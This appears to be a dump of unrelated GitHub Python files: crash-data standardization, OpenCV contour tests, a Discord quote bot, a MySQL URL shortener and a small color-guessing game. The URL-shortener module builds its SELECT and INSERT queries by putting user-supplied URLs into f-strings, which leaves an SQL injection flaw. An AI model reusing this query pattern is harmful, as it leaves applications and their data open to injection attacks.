add_city_specific_fields(crash, formatted_crash, fields):\n\n # Add summary and address\n if \"summary\" in list(fields.keys()) and fields[\"summary\"]:\n formatted_crash[\"summary\"] = crash[fields[\"summary\"]]\n if \"address\" in list(fields.keys()) and fields[\"address\"]:\n formatted_crash[\"address\"] = crash[fields[\"address\"]]\n\n # Add all features that have been specified under split_columns\n if 'split_columns' in fields:\n formatted_crash = add_split_columns(crash, formatted_crash, fields)\n return formatted_crash\n\n\ndef add_split_columns(crash, formatted_crash, fields):\n \"\"\"\n Add any fields specified in the split_columns field of the config\n Args:\n crash - a dict of unformatted crash information\n formatted_crash - a dict with formatted crash fields\n fields - a dict of config information about the crash fields\n Returns:\n formatted_fields\n \"\"\"\n split_columns = fields['split_columns']\n\n # Negative splits are all fields that only have a positive value if none of\n # the columns specified in not_column have values, so look at these separately\n negative_splits = [x for x in split_columns if 'not_column' in split_columns[x].keys()]\n splits_dict = {}\n for key, value in split_columns.items():\n\n if key in negative_splits or 'column_value' not in value or not value['column_name']:\n continue\n\n if value['column_value'] == 'any' and crash[value['column_name']]:\n splits_dict[key] = 1\n else:\n if crash[value['column_name']] == value['column_value']:\n splits_dict[key] = 1\n\n for column in negative_splits:\n # These are the columns that can't have a value for the current column to be true\n # E.g. column is vehicle, and bike and pedestrian need to not be present in splits_dict\n compare_columns = split_columns[column]['not_column'].split()\n value = True\n\n for compare_column in compare_columns:\n if compare_column in splits_dict:\n value = False\n if value:\n splits_dict[column] = 1\n\n for key, value in splits_dict.items():\n formatted_crash[key] = value\n\n return formatted_crash\n\n\ndef add_id(csv_file, id_field):\n \"\"\"\n If the csv_file does not contain an id, create one\n \"\"\"\n\n rows = []\n with open(csv_file) as f:\n csv_reader = csv.DictReader(f)\n count = 1\n for row in csv_reader:\n if id_field in row:\n break\n row.update({id_field: count})\n rows.append(row)\n count += 1\n if rows:\n with open(csv_file, 'w') as f:\n writer = csv.DictWriter(f, list(rows[0].keys()))\n writer.writeheader()\n for row in rows:\n writer.writerow(row)\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\", \"--config\", type=str, required=True,\n help=\"config file\")\n parser.add_argument(\"-d\", \"--datadir\", type=str, required=True,\n help=\"data directory\")\n\n args = parser.parse_args()\n\n # load config\n config_file = args.config\n config = data.config.Configuration(config_file)\n\n crash_dir = os.path.join(args.datadir, \"raw/crashes\")\n if not os.path.exists(crash_dir):\n raise SystemExit(crash_dir + \" not found, exiting\")\n\n print(\"searching \"+crash_dir+\" for raw files:\")\n dict_crashes = {}\n\n for csv_file, csv_config in config.crashes_files.items():\n if not os.path.exists(os.path.join(crash_dir, csv_file)):\n raise SystemExit(os.path.join(\n crash_dir, csv_file) + \" not found, exiting\")\n\n add_id(\n os.path.join(crash_dir, csv_file), csv_config['required']['id'])\n\n print(\"processing {}\".format(csv_file))\n\n df_crashes = pd.read_csv(os.path.join(\n crash_dir, csv_file), na_filter=False)\n 
raw_crashes = df_crashes.to_dict(\"records\")\n\n std_crashes = read_standardized_fields(\n raw_crashes,\n csv_config['required'],\n csv_config['optional'],\n config.timezone,\n args.datadir,\n config.city,\n config.startdate,\n config.enddate\n )\n\n print(\"{} crashes loaded with standardized fields, checking for specific fields\".format(\n len(std_crashes)))\n dict_crashes.update(std_crashes)\n\n print(\"{} crashes loaded, validating against schema\".format(len(dict_crashes)))\n\n schema_path = os.path.join(BASE_FP, \"standards\", \"crashes-schema.json\")\n list_crashes = list(dict_crashes.values())\n crashes_output = os.path.join(args.datadir, \"standardized/crashes.json\")\n validate_and_write_schema(schema_path, list_crashes, crashes_output)\n","repo_name":"insight-lane/crash-model","sub_path":"src/data_standardization/standardize_crashes.py","file_name":"standardize_crashes.py","file_ext":"py","file_size_in_byte":11551,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"31"} +{"seq_id":"42073462237","text":"import cv2 as cv\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport imutils\n#from keras.preprocessing import image as pics\n\n#------------------------------------------------------------------------------------------------------``\ndef find_contours(img): \n contours, hierarchy = cv.findContours(image=img, mode=cv.RETR_TREE, method=cv.CHAIN_APPROX_SIMPLE)\n\n # draw contours on the original image\n image_copy = img.copy()\n cv.drawContours(image=image_copy, contours=contours, contourIdx=-1, color=(0, 255, 0), thickness=2, lineType=cv.LINE_AA)\n\n # see the results\n cv.imshow('Contour Approximation', image_copy)\n cv.waitKey(0)\n cv.imwrite('contours_none_image1.jpg', image_copy)\n cv.destroyAllWindows()\n\ndef threshold_test():\n image = cv.imread(r'C:\\Users\\ducke\\parking_spots\\download.jpg')\n cv.imshow(\"Original Image\", image)\n\n ret,thresh1 = cv.threshold(image,127,255,cv.THRESH_BINARY)\n ret,thresh2 = cv.threshold(image,127,255,cv.THRESH_BINARY_INV)\n ret,thresh3 = cv.threshold(image,127,255,cv.THRESH_TRUNC)\n ret,thresh4 = cv.threshold(image,127,255,cv.THRESH_TOZERO)\n ret,thresh5 = cv.threshold(image,127,255,cv.THRESH_TOZERO_INV)\n titles = ['Original Image','BINARY','BINARY_INV','TRUNC','TOZERO','TOZERO_INV']\n images = [image, thresh1, thresh2, thresh3, thresh4, thresh5]\n for i in range(6):\n plt.subplot(2,3,i+1),plt.imshow(images[i],'gray',vmin=0,vmax=255)\n plt.title(titles[i])\n plt.xticks([]),plt.yticks([])\n plt.show()\n\ndef is_contour_bad(c):\n peri = cv.arcLength(c, True)\n approx = cv.approxPolyDP(c, 0.02 * peri, True)\n\n return not len(approx) == 4\n\n# Detects potential cars based on how circular it is, returns boolean\ndef vehicle_detector_contour(contour_length, contour_area):\n return ((contour_length**2)/ contour_area) <= 20 # to roughly circular, like a car, adjust the value as needed\n\ndef main():\n image = cv.imread(r'C:\\Users\\ducke\\parking_spots\\download.jpg')\n cv.imshow(\"Original Image\", image)\n\n grey = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n thresh = cv.adaptiveThreshold(grey, 255, cv.ADAPTIVE_THRESH_MEAN_C,\n cv.THRESH_BINARY, 199, 5)\n t2 = cv.adaptiveThreshold(grey, 255, cv.ADAPTIVE_THRESH_MEAN_C,\n cv.THRESH_BINARY, 199, 5)\n cv.imshow('Adaptive Gaussian', thresh)\n cv.imshow('Mean', t2)\n\n find_contours(thresh)\n\n\n \n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"mackenziehamlett/SpotSpotter","sub_path":"CV2/CV_test1.py","file_name":"CV_test1.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3814073749","text":"import asyncio\r\nimport utility\r\nimport commands.wb\r\nimport secret\r\n\r\n\r\nclass QuoteTimer:\r\n def __init__(self, client, server):\r\n self.client = client\r\n self.server = server\r\n self.channel = utility.getServerTimerChannel(server)\r\n self.timer = utility.getServerTimer(server.name)\r\n self.loop = asyncio.get_event_loop()\r\n\r\n def setup(self):\r\n self.startTimer()\r\n print(\"Set up QuoteTimer for \" + self.server.name + \" in #\" + self.channel.name +\r\n \" with a \" + str(self.timer) + \" second interval\")\r\n\r\n def startTimer(self):\r\n self.timer = utility.getServerTimer(self.server.name)\r\n self.loop.create_task(self.periodicWB())\r\n\r\n async def periodicWB(self):\r\n print(\"QuoteTimer \" + self.server.name + \" in #\" + self.channel.name +\r\n \": start periodicWB\")\r\n await self.client.wait_until_ready()\r\n sleep_timer = self.timer\r\n if self.timer == 0:\r\n sleep_timer = 600\r\n print(\"QuoteTimer \" + self.server.name + \" in #\" + self.channel.name +\r\n \": start sleep\")\r\n await asyncio.sleep(sleep_timer)\r\n print(\"QuoteTimer \" + self.server.name + \" in #\" + self.channel.name +\r\n \": end sleep\")\r\n\r\n if self.timer != 0:\r\n print(\"QuoteTimer \" + self.server.name + \" in #\" + self.channel.name +\r\n \": Getting quote\")\r\n number_string, line = commands.wb.ex_with_params(self.server.name)\r\n print(\"QuoteTimer \" + self.server.name + \" in #\" + self.channel.name +\r\n \": Quote got\")\r\n if number_string:\r\n print(\"QuoteTimer \" + self.server.name + \" in #\" + self.channel.name +\r\n \": Getting channel\")\r\n channel = utility.getServerTimerChannel(self.server)\r\n print(\"QuoteTimer \" + self.server.name + \" in #\" + self.channel.name +\r\n \": Channel got\")\r\n if channel is not None:\r\n skip = False\r\n print(\"QuoteTimer \" + self.server.name + \" in #\" + self.channel.name +\r\n \": Getting logs\")\r\n async for msg in self.client.logs_from(channel, limit=10):\r\n if msg.author.name == secret.BOT_NAME:\r\n skip = True\r\n break\r\n print(\"QuoteTimer \" + self.server.name + \" in #\" + self.channel.name +\r\n \": Logs got\")\r\n if not skip:\r\n print(\"QuoteTimer \" + self.server.name + \" in #\" + self.channel.name +\r\n \": Sending message\")\r\n await self.client.send_message(channel, utility.wbBlock(number_string, line))\r\n print(\"QuoteTimer \" + self.server.name + \" in #\" + self.channel.name +\r\n \": Message sent\")\r\n self.startTimer()\r\n\r\n","repo_name":"sp9999/Discord","sub_path":"MagicConch/QuoteTimer.py","file_name":"QuoteTimer.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33129502673","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom utils import parse_annotation\n\n\ndef plot_box(image, bbox, save=True, show=False):\n left = int(bbox[0])\n top = int(bbox[1])\n right = int(bbox[2])\n bottom = int(bbox[3])\n\n # plot box\n cv2.rectangle(image, (left, top), (right, bottom), (0, 0, 255), 3)\n\n # show image\n if show:\n cv2.imshow('image', image)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n if save:\n cv2.imwrite('data/street_bbox.jpg', image)\n\n\nif __name__ == \"__main__\":\n 
image_path = \"data/street.jpg\"\n annotations_path = \"data/street.xml\"\n\n # read image and get width, height\n image = cv2.imread(image_path)\n h, w, _ = image.shape\n\n # get bounding box\n bbox = parse_annotation(annotations_path)\n\n # plot boinding box and save image\n plot_box(image, bbox)\n","repo_name":"kaka-lin/ML-Notes","sub_path":"Object Detection/resize-keep-aspect-ratio/plot_box.py","file_name":"plot_box.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"38533411480","text":"import os\nimport mysql.connector\nfrom mysql.connector import errorcode\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\n\nconfig = {\n \"host\": os.getenv(\"SERVER\"),\n \"port\": os.getenv(\"PORT\"),\n \"user\": os.getenv(\"USER\"),\n \"password\": os.getenv(\"PASSWORD\"),\n \"db\": os.getenv(\"DATABASE\"),\n \"raise_on_warnings\": True,\n}\n\ndef buscar(url_corta):\n try:\n cnx = mysql.connector.connect(**config)\n\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n print(\"Algo está mal con el nombre de usuario o contraseña\")\n print(err)\n elif err.errno == errorcode.ER_BAD_DB_ERROR:\n print(\"La base de datos no existe\")\n else:\n print(err)\n\n else:\n if len(url_corta) == 5:\n cursor = cnx.cursor()\n consultilla_larga = cursor.execute(\n f\"\"\"SELECT url_large FROM equipo_a.urls WHERE url_short = \"{url_corta}\";\"\"\"\n )\n resultado_larga = cursor.fetchone()\n\n if resultado_larga is not None:\n url_larga = resultado_larga[0]\n\n cursor.close()\n cnx.close()\n\n return url_larga\n\ndef almacenar(url_corta, url_larga):\n try:\n cnx = mysql.connector.connect(**config)\n\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n print(\"Algo está mal con el nombre de usuario o contraseña\")\n elif err.errno == errorcode.ER_BAD_DB_ERROR:\n print(\"La base de datos no existe\")\n else:\n print(err)\n\n else:\n cursor = cnx.cursor()\n q_data_guardar = f\"\"\"INSERT INTO `equipo_a`.`urls` (`url_short`, `url_large`)\n VALUES ('{url_corta}', '{url_larga}');\n \"\"\"\n cursor.execute(q_data_guardar)\n cnx.commit()\n\n cursor.close()\n cnx.close()\n","repo_name":"agusspoxe/acortador_url","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13736673888","text":"''' COLOR GUESS GAME(CGG) version 0.2\r\n------------------------------------------------------\r\n Created by Justin J. De La Cruz\r\n Game where you have to write the color of the text\r\n and not the text written.\r\n\r\n version 0.2 changes:\r\n - Included Classes\r\n - New GUI design\r\n---------------------------------------------------------\r\n'''\r\n\r\nfrom graphics import *\r\nimport random\r\nimport time\r\nimport threading\r\n\r\n# Global variables\r\n\r\ncolors = ['red','blue','green','pink','white','yellow','orange','purple']\r\ntimer = 30 #not in game\r\nscore = 0\r\n\r\nwin = GraphWin(\"Color Guess Game ver. 
0.2\",350,350)\r\nwin.setCoords(0,0,500,500)\r\nwin.setBackground(\"black\")\r\n\r\nscoreText = Text(Point(250.0,480.0),\"Score: %s\" %score)\r\nscoreText.setFill(\"white\")\r\nscoreText.setSize(15)\r\nscoreText.setStyle(\"bold\")\r\nscoreText.setFace(\"courier\")\r\nscoreText.draw(win)\r\n\r\n# Classes\r\n\r\nclass GUI:\r\n ''' It displays the games window using Zelle graphics.py '''\r\n def __init(self, win):\r\n self.win = win \r\n\r\n def window(self): \r\n rectange = Rectangle(Point(20.0,100.0),Point(480.0,460.00)) \r\n rectange.setOutline(\"red\")\r\n #rectange.setFill(\"white\")\r\n rectange.draw(win)\r\n\r\n back_Circle = Circle(Point(250.0,280.0),125)\r\n back_Circle.setFill(\"light gray\")\r\n back_Circle.setOutline(\"gray\")\r\n #back_Circle.draw(win)\r\n\r\n\r\n startText = Text(Point(250.0,275.0),\"Start Game.\")\r\n startText.setFill(\"white\")\r\n startText.setFace(\"courier\")\r\n startText.setSize(30)\r\n startText.draw(win)\r\n\r\n subtitle_Text = Text(Point(250.0,85.0),\"Write the color, NOT THE TEXT!\")\r\n subtitle_Text.setFill(\"white\")\r\n subtitle_Text.setSize(13)\r\n subtitle_Text.setFace(\"courier\")\r\n subtitle_Text.setStyle(\"bold\")\r\n subtitle_Text.draw(win)\r\n\r\n while True: \r\n win.getMouse()\r\n startText.undraw()\r\n break\r\n '''\r\n timeText = Text(Point(60.0,85.0), \"Timer: %s\" %timer)\r\n timeText.draw(win)\r\n '''\r\n \r\n def ballBounce(self):\r\n ball = Circle(Point(250.0,250.0), 50)\r\n ball.setOutline(\"light gray\")\r\n ball.setFill(str(random.choice(colors)))\r\n ball.draw(win)\r\n\r\n dx = 1\r\n dy = 1\r\n\r\n while win.checkMouse():\r\n \r\n ball.move(dx,dy)\r\n \r\n\r\n if ball.getP1().getX() == 20.0 or ball.getP2().getX() == 480.0:\r\n\r\n dx = -dx\r\n ball.setFill(random.choice(colors))\r\n\r\n if ball.getP1().getY() == 100.0 or ball.getP2().getY() == 460.0:\r\n\r\n dy = -dy\r\n ball.setFill(random.choice(colors))\r\n \r\n update(100) \r\n \r\nclass Game:\r\n ''' This class has the game's main functionality '''\r\n \r\n def __init__(self):\r\n pass \r\n\r\n def entryBox(self):\r\n input = Entry(Point(250.0,50.0),25)\r\n input.setText('')\r\n input.setFill('white')\r\n input.draw(win)\r\n win.checkKey()\r\n\r\n while True:\r\n key = win.getKey()\r\n\r\n if key == \"Return\":\r\n input_Color = str(input.getText().lower())\r\n break\r\n \r\n return input_Color \r\n\r\n def countdown():\r\n ''' Timer for game '''\r\n global timer\r\n\r\n for count in range(timer, 0, -1):\r\n timer -=1\r\n timer.sleep(1)\r\n\r\n if timer == 0:\r\n print(\"TIMES UP!\")\r\n break\r\n\r\n def game_reset(self):\r\n global score\r\n global timer\r\n\r\n leaderboard_Text = Text(Point(250.0,280.0),\"Play Again?...\\n (yes or no)\")\r\n leaderboard_Text.setFill(\"white\")\r\n leaderboard_Text.setSize(16)\r\n leaderboard_Text.setFace(\"courier\")\r\n leaderboard_Text.setStyle(\"bold\")\r\n leaderboard_Text.draw(win)\r\n\r\n if (Game.entryBox(self) == 'yes'):\r\n leaderboard_Text.setText(\"Reseting...\")\r\n print(\"Game reset...\")\r\n score = 0\r\n timer = 30\r\n time.sleep(2)\r\n leaderboard_Text.setText(\"Starting...\")\r\n print(\"Starting game...\")\r\n time.sleep(2)\r\n leaderboard_Text.setText(\"\") \r\n\r\n else:\r\n exit() \r\n\r\n def leaderstats(self):\r\n ''' Stores player's name and score on leaderboard_CGG.txt''' \r\n global score\r\n \r\n infile = open('leaderboard_CGG.txt','r')\r\n outline = open('leaderboard_CGG.txt','a')\r\n \r\n outline.write(\"\\n\")\r\n leaderboard_Text = Text(Point(250.0,280.0),\"LeaderBoard:\\n Enter your name.\")\r\n 
leaderboard_Text.setFill(\"white\")\r\n leaderboard_Text.setSize(16)\r\n leaderboard_Text.setFace(\"courier\")\r\n leaderboard_Text.setStyle(\"bold\")\r\n leaderboard_Text.draw(win)\r\n\r\n outline.write(Game.entryBox(self))\r\n \r\n outline.write(\" \")\r\n outline.write(str(score))\r\n print(\"Player data stored...\")\r\n\r\n leaderboard_Text.setText(\"Ok,\\nStoring your score...\")\r\n time.sleep(2)\r\n leaderboard_Text.setText(\"Done! name stored\")\r\n time.sleep(2)\r\n leaderboard_Text.setText(\" \")\r\n \r\n infile.close()\r\n outline.close() \r\n \r\n def gameplay(self):\r\n ''' Game functionality '''\r\n global score\r\n\r\n entryBox = Game.entryBox\r\n\r\n while True:\r\n\r\n random_color = random.choice(colors)\r\n random_Fill = random.choice(colors)\r\n answer_color = random_Fill\r\n\r\n colorText = Text(Point(250.0,280.0), random_color)\r\n colorText.setFill(random_Fill)\r\n colorText.setSize(36)\r\n colorText.draw(win)\r\n\r\n if (entryBox(self) == answer_color): \r\n score += 1\r\n scoreText.setText(\"Score: \" + str(score))\r\n colorText.setText(random_color)\r\n #print(\"Good answer\") #Terminal answer\r\n\r\n goodLabel = Text(Point(250.0,280.0), \"Good Answer\")\r\n goodLabel.setSize(20)\r\n goodLabel.setFill(\"white\")\r\n goodLabel.setFace(\"courier\")\r\n goodLabel.draw(win)\r\n\r\n colorText.setText(\"\")\r\n time.sleep(0.5)\r\n goodLabel.setText(\"\")\r\n \r\n else:\r\n #print(\"Bad answer\") #Terminal answer\r\n badLabel = Text(Point(250.0,280.0),\"Bad Answer:\\n %s\" %answer_color)\r\n badLabel.setSize(20)\r\n badLabel.setFill(\"white\")\r\n badLabel.setFace(\"courier\")\r\n badLabel.draw(win)\r\n\r\n colorText.setText(\"\")\r\n time.sleep(2.5)\r\n badLabel.setText(\"\")\r\n\r\n colorText.setText(\"\")\r\n \r\n gameover_Label = Text(Point(250.0,280.0),\"GAME OVER\")\r\n gameover_Label.setSize(20)\r\n gameover_Label.setFill(\"white\")\r\n gameover_Label.setStyle(\"bold\")\r\n gameover_Label.setFace(\"courier\")\r\n gameover_Label.draw(win)\r\n print(\"GAME OVER...\")\r\n time.sleep(2)\r\n gameover_Label.undraw()\r\n break\r\n\r\n def gameStart(self):\r\n '''Include all functions from class Game and GUI'''\r\n \r\n while True: \r\n gui = GUI()\r\n gui.window()\r\n game.gameplay()\r\n game.leaderstats()\r\n game.game_reset() \r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n game = Game()\r\n game.gameStart()\r\n","repo_name":"Nytsu/GGC-COLOR_GUESS_GAME","sub_path":"CGG ver.0.2.py","file_name":"CGG ver.0.2.py","file_ext":"py","file_size_in_byte":8301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26890200914","text":"import copy\nimport pandas as pd\n\nfrom wadi.base import WadiBaseClass\nfrom wadi.infotable import InfoTable\nfrom wadi.utils import check_arg, valid_kwargs\n\n# Valid values for the 'format' kwarg\nVALID_FORMATS = [\"stacked\", \"wide\", \"gef\"]\n\n# Required column headers for 'stacked' format\nREQUIRED_COLUMNS_S = [\"SampleId\", \"Features\", \"Values\", \"Units\"]\nDEFAULT_C_DICT = {s: s for s in REQUIRED_COLUMNS_S}\n\n# Valid values for the 'datatype' kwarg for 'wide' format\nVALID_DATATYPES = [\"sampleinfo\", \"feature\"]\n# Select one of the VALID_DATATYPES as the default datatype\nDEFAULT_DATATYPE = VALID_DATATYPES[1]\n\n# Default NaN values, used if user does not specify a value for the na_values\n# kwarg for read_excel or read_csv\n# Copied from https://pandas.pydata.org/docs/reference/api/pandas.read_csv.html\nDEFAULT_NA_VALUES = [\n \"\",\n \"-1.#IND\",\n \"1.#QNAN\",\n 
\"1.#IND\",\n \"-1.#QNAN\",\n \"#N/A\",\n \"N/A\",\n #'NA', # Commented to avoid ambiguity with Na (Sodium)\n \"#NA\",\n \"NULL\",\n \"NaN\",\n \"-NaN\",\n \"nan\",\n \"-nan\",\n]\n\n\nclass FileReader(WadiBaseClass):\n \"\"\"\n WaDI class for importing data files.\n \"\"\"\n\n def __call__(\n self,\n file_path,\n format=\"stacked\", # str, immutable\n c_dict=None,\n mask=None,\n lod_column=None,\n extract_units_from_feature_name=False,\n pd_reader=\"read_excel\", # str, immutable\n **kwargs,\n ):\n\n \"\"\"\n This method provides an interface for the user to set the\n attributes that determine the FileReader object behavior.\n\n Parameters\n ----------\n file_path : str\n The file to be read.\n format : str, optional\n Specifies if the data in the file are in 'stacked' or 'wide'\n format. Permissible formats are defined in VALID_FORMATS.\n The 'gef' format is not implemented (yet). Default: 'stacked'\n c_dict : dict, optional\n Only used when the format is 'stacked'. This dictionary maps\n column names in the file to the compulsory column names defined\n in REQUIRED_COLUMNS_S. Default: DEFAULT_C_DICT\n mask : str, optional\n Name of the column that contains True/False labels. These sometimes\n occur in stacked data files to indicate if a reported value is \n below or above the detection limit. If a valid column name is \n specified, the values marked with `False` are filtered out from \n the converted DataFrame. Only used when the format is 'stacked'.\n Default: None\n lod_column : str, optional\n Name of the column that contains information about whether the \n reported measurement value is below or above the limit of \n detection (LOD). If a valid column name is specified, the\n symbol is prefixed to the measurement value.\n Only used when the format is 'stacked'. Default: None\n extract_units_from_feature_name : bool\n Indicates if the feature name also contains the units. Default:\n False\n pd_reader : str, optional\n Name of the Pandas function to read the file. Must be a valid\n function name. While all functions implemented in Pandas could\n be used in principle, the design of WaDI has not been tested\n for functions other than read_excel and read_csv. Default:\n 'read_excel'.\n **kwargs: dict, optional\n Dictionary with kwargs for the 'pd_reader' function. The\n kwargs can be a mix of WaDI specific keywords and valid\n keyword arguments for the 'pd_reader' function.\n \"\"\"\n\n self._file_path = file_path\n self._pd_reader = pd_reader\n\n # Check if user provided a valid format specifier\n format = check_arg(format, VALID_FORMATS)\n # Raise error if the format is not yet implemented\n if format in [\"gef\"]:\n raise NotImplementedError(f\"Format option {format} not implemented yet\")\n self._format = format # for use in read_data\n\n # Use c_dict to look up the names of the columns with the compulsory\n # names for stacked data.\n self._c_dict = c_dict or DEFAULT_C_DICT\n\n self._mask = mask\n self._lod_column = lod_column\n self._extract_units_from_feature_name = extract_units_from_feature_name\n\n self._kwargs = copy.deepcopy(vars()[\"kwargs\"]) # deepcopy just to be sure\n\n def _execute(self):\n \"\"\"\n This method imports the data from a file format readable by\n Pandas. Before calling the Pandas reader function, it checks\n the kwargs specified by the user when the class object was \n initialized. 
\n \"\"\"\n\n # Use the defaults for na_values if the user did not specify their own\n if \"na_values\" not in self._kwargs:\n self._kwargs[\"na_values\"] = DEFAULT_NA_VALUES\n\n # Check if the user specified the 'blocks' kwarg, which\n # means that multiple dataframes must be read and joined\n if \"blocks\" not in self._kwargs:\n # If blocks is not in kwargs then store the kwargs in a\n # one-element list\n blocks = [self._kwargs]\n else:\n # If blocks is in kwargs then check if it's a sequence\n # before continuing\n blocks = self._kwargs[\"blocks\"]\n if not isinstance(blocks, (list, tuple)):\n raise ValueError(\"Argument 'blocks' must be a list or a tuple\")\n\n # Loop over the blocks to perform some checks for inconsistent kwargs\n for kwargs in blocks:\n # For stacked data the units and datatype are inferred\n # from c_dict when the InfoTable is created\n if (self._format == \"stacked\") & (\"units_row\" in kwargs):\n kwargs.pop(\"units_row\")\n self._warn(\n \"Argument 'units_row' can not be used in combination with stacked format and will be ignored.\"\n )\n if (self._format == \"stacked\") & (\"datatype\" in kwargs):\n kwargs.pop(\"datatype\")\n self._warn(\"Argument 'datatype' is ignored when format is 'stacked'.\")\n\n # Call _read_file to import the (blocks of) data into a single \n # DataFrame.\n df, units, datatypes = self._read_file(self._file_path, self._pd_reader, blocks)\n\n if self._format == \"stacked\":\n # Use the values in the column with name 'mask' to\n # hide the values labelled as False from view.\n if self._mask is not None:\n df = df.loc[df[self._mask]]\n\n if self._lod_column is not None:\n df[self._c_dict[\"Values\"]] = df[self._lod_column] + df[self._c_dict[\"Values\"]].astype(str)\n\n # Create the InfoTable dictionary that stores views to the\n # imported data as well as additional information (units,\n # data type)\n infotable = InfoTable(\n df,\n self._format,\n self._c_dict,\n units,\n datatypes,\n self._extract_units_from_feature_name,\n )\n\n # Write the __str__ representation of the InfoTable to the\n # log file.\n self._log(infotable)\n\n # Write the log string to the log file\n self.update_log_file()\n\n return df, infotable\n\n def _read_file(\n self,\n file_path,\n pd_reader_name,\n blocks,\n ):\n \"\"\"\n This method calls the specified Pandas reader function to\n perform the actual data import from file_path. It imports\n a DataFrame with the data as well as lists with the\n measurement units and the datatypes (the latter two are \n not used when the data are in 'stacked' format).\n\n Parameters\n ----------\n file_path : str\n The file to be read.\n pd_reader_name : str\n Name of the Pandas function to read the file.\n blocks : list\n List with keyword arguments that specify (i) the number\n of the row with the units, (ii) the datatpe and (iii) any\n kwargs for the pd_reader function. Note that (i) and (ii)\n do not apply to 'stacked' data.\n\n Returns\n ----------\n df : DataFrame\n Pandas DataFrame with the imported data\n units : list\n List with the units for each column read.\n datatypes: list\n List with the datatypes for each column read.\n\n Raises\n ------\n ValueError\n When index_col is a kwarg in one of the blocks.\n\n Notes\n ----------\n The return values units and datatypes are used when the\n InfoTable is created for 'wide' format data. 
They are not\n used when the data format is 'stacked'.\n \"\"\"\n\n # Inform user with message on screen that reading has started (may\n # take a long time for large files)\n self._msg(f\"Reading data\", header=True)\n self._log(f\"* Reading file {file_path} with the following Pandas call(s):\")\n\n # Get reference to pandas reader function and determine its valid\n # keyword arguments\n pd_reader = getattr(pd, pd_reader_name)\n if not (pd_reader.__name__ in [\"read_excel\", \"read_csv\"]):\n self._warn(\n f\"WaDI has not been designed to work with reader {pd_reader}. Proceed with caution.\"\n )\n\n # Start with an empty DataFrame...\n df = pd.DataFrame()\n # ... and empty lists for units and datatype.\n units = []\n datatypes = []\n # Loop over the sets of kwargs in the block(s).\n for pd_kwargs in blocks:\n # Set values for unit_row and datatype, these may be\n # overridden if the user specified a kwarg for any\n # of them.\n units_row = -1\n datatype = DEFAULT_DATATYPE\n # Loop over the user-specified kwargs.\n for kwarg in pd_kwargs.copy(): # copy() is needed to avoid a RuntimeError\n if kwarg == \"units_row\":\n units_row = pd_kwargs[kwarg]\n # Check if a valid datatype was passed and convert to\n # one of the standard formats contained in VALID_DATAYPES.\n if kwarg == \"datatype\":\n datatype = check_arg(pd_kwargs[kwarg], VALID_DATATYPES)\n # Index columns are not supported to avoid duplicate.\n # index errors etc.\n if kwarg == \"index_col\":\n raise ValueError(\"Argument 'index_col' not allowed in WADI\")\n\n # Create a verbose message for the log file.\n kws = \", \".join(f\"{k}={v}\" for k, v in pd_kwargs.items())\n self._log(f\" - pandas.{pd_reader_name}('{file_path}', {kws})\")\n\n # Call the requested Pandas reader function to import the data.\n df_r = pd_reader(file_path, **valid_kwargs(pd_reader, **pd_kwargs))\n\n # Use the pd.concat function to join the return values from the\n # pandas reader function (i.e. the DataFrames read from the file).\n df = pd.concat([df, df_r], axis=1)\n\n # Read the units if the user specified a valid row number, else...\n if units_row > -1:\n units += self._read_single_row_as_list(\n file_path, pd_reader, pd_kwargs, units_row\n )\n # ... 
create a list of empty strings with the same length as the\n # number of columns read\n else:\n units += [\"\"] * df_r.shape[1]\n\n # Make sure that the datatype for this block is copied as many\n # times as there are columns in the DataFrame that was read\n datatypes += [datatype] * df_r.shape[1]\n\n return df, units, datatypes\n\n def _read_single_row_as_list(\n self,\n file_path,\n pd_reader,\n pd_kwargs,\n row_number,\n ):\n \"\"\"\n This method calls the specified Pandas reader function to\n read a single row from file_path.\n\n Parameters\n ----------\n file_path : str\n The file to be read.\n pd_reader_name : str\n Name of the Pandas function to read the file.\n pd_kwargs : dict\n Keyword arguments for the pd_reader function.\n row_number : int\n The (zero-based) number of the row to read.\n\n Returns\n ----------\n result : list\n List with the values read.\n \"\"\"\n # Assemble the appropriate kwargs to read a single row,\n # this may include the user-specified keywords sheet_name\n # and usecols.\n sr_kwargs = {} # sr is shorthand for single row\n if \"sheet_name\" in pd_kwargs:\n sr_kwargs[\"sheet_name\"] = pd_kwargs[\"sheet_name\"]\n if \"usecols\" in pd_kwargs:\n sr_kwargs[\"usecols\"] = pd_kwargs[\"usecols\"]\n sr_kwargs[\"header\"] = None\n # Note that header=None does not seem to work in conjuction\n # with skiprows! Therefore, read the data up until row \n # row_number + 1, the units will be in the last row of the\n # dataframe returned by the reader.\n sr_kwargs[\"nrows\"] = row_number + 1\n\n # Read the data, replace any NaNs with empty strings and \n # return the last row of the DataFrame as a list\n return pd_reader(file_path, **sr_kwargs).fillna(\"\").values[-1].tolist()\n","repo_name":"KWR-Water/wadi","sub_path":"wadi/filereader.py","file_name":"filereader.py","file_ext":"py","file_size_in_byte":13556,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"13770600256","text":"#!/usr/bin/env python\n\n\nimport sys\nimport os\nimport json\n\n\nDIRECTORY = 